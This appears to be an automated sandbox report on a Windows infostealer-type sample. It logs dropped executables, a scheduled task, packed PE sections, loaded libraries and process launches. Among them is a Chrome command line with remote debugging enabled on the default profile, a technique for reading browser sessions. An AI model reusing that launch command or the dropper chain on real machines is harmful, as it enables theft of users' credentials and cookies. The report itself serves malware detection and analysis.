Source: chrome.exe, 00000008.00000002.3220461351.00002190004B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000008.00000002.3223906969.0000219000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000008.00000002.3223906969.0000219000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000008.00000002.3223906969.0000219000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000008.00000002.3222987650.00002190009E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3223080345.0000219000A1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000008.00000003.3195865115.0000219000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220647991.000021900053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191355319.0000219000CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000008.00000002.3223530671.0000219000B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000008.00000002.3221717972.000021900074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/CharBl3
Source: chrome.exe, 00000008.00000002.3225233960.0000219000EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000008.00000002.3225318147.0000219000EC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3226130173.0000219001170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 00000008.00000002.3224032642.0000219000C60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000008.00000002.3222280682.00002190008A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3225346648.0000219000ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221685081.0000219000728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000008.00000002.3222280682.00002190008A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3225346648.0000219000ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221685081.0000219000728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000008.00000002.3222683310.0000219000964000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000008.00000002.3223624910.0000219000B70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220611083.000021900050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220842992.00002190005D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3222948871.00002190009C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000008.00000002.3222948871.00002190009C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000008.00000003.3197614520.0000219001224000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000008.00000002.3220500303.00002190004D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000008.00000002.3222810881.0000219000984000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000008.00000002.3217034436.000021900001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220842992.00002190005D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224609978.0000219000D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000008.00000002.3220500303.00002190004D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000008.00000002.3224609978.0000219000D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000008.00000002.3221269075.0000219000632000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000008.00000002.3223851591.0000219000BF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3225024979.0000219000E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221269075.0000219000632000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224609978.0000219000D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000008.00000002.3221269075.0000219000632000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000008.00000002.3223966699.0000219000C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224703341.0000219000D80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221269075.0000219000632000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954

System Summary
barindex
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File dump: service123.exe.7.dr 296534016 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: 870da04327.exe.6.dr Static PE information: section name:
Source: 870da04327.exe.6.dr Static PE information: section name: .rsrc
Source: 870da04327.exe.6.dr Static PE information: section name: .idata
Source: 870da04327.exe.6.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A7049 6_2_000A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A8860 6_2_000A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A78BB 6_2_000A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A2D10 6_2_000A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A31A8 6_2_000A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00064DE0 6_2_00064DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00064B30 6_2_00064B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00097F36 6_2_00097F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_000A779B 6_2_000A779B
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe BBA49D9C5A233F7916671750711049BE4108A7FFAE09E955BC9E90C03D2C4AB1
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9977115974114441
Source: file.exe Static PE information: Section: sxkyywio ZLIB complexity 0.9946766634558387
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9977115974114441
Source: skotes.exe.0.dr Static PE information: Section: sxkyywio ZLIB complexity 0.9946766634558387
Source: random[1].exe.6.dr Static PE information: Section: lklnedip ZLIB complexity 0.9946395180637877
Source: 870da04327.exe.6.dr Static PE information: Section: lklnedip ZLIB complexity 0.9946395180637877
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/6@10/6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000008.00000002.3222527685.000021900093D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 50%
Source: file.exe Virustotal: Detection: 43%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe "C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe"
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2212,i,12169460362055514967,5517979539831141923,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe "C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2212,i,12169460362055514967,5517979539831141923,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008370001\870da04327.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: file.exe Static file information: File size 1931776 > 1048576
Source: file.exe Static PE information: Raw size of sxkyywio is bigger than: 0x100000 < 0x1a5c00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sxkyywio:EW;kanpqnsy:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: random[1].exe.6.dr Static PE information: real checksum: 0x43bdd6 should be: 0x441d69
Source: 870da04327.exe.6.dr Static PE information: real checksum: 0x43bdd6 should be: 0x441d69
Source: file.exe Static PE information: real checksum: 0x1d845a should be: 0x1dea14
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d845a should be: 0x1dea14
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
